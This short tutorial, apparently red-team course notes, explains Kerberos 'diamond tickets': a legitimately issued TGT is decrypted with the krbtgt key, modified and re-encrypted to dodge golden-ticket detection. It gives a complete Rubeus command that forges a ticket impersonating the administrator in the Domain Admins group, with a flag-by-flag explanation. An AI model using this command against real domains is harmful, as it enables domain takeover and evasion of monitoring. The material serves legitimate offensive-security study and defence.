Diamond Tickets

Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don't track TGTs it (or they) have legitimately issued, they will happily accept TGTs that are encrypted with its own krbtgt hash.

Therefore, a possible tactic to detect the use of golden tickets is to look for TGS-REQs that have no corresponding AS-REQ. A "diamond ticket" is made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain's krbtgt hash, modifying the desired fields of the ticket, then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket because any TGS-REQs will have a preceding AS-REQ.

Diamond tickets can be created with Rubeus

Rubeus.exe diamond /tgtdeleg /ticketuser:administrator /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap

• /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the current user without needing to know their password, NTLM/AES hash, or elevation on the host.

• /ticketuser is the username of the user to impersonate.

• /ticketuserid is the domain RID of that user.

• /groups are the desired group RIDs (512 being Domain Admins).

• /krbkey is the krbtgt AES256 hash.

Rubeus describe will now show that this is a TGT for the target user.

Rubeus.exe describe /ticket:doIFYj ...snip... MuSU8=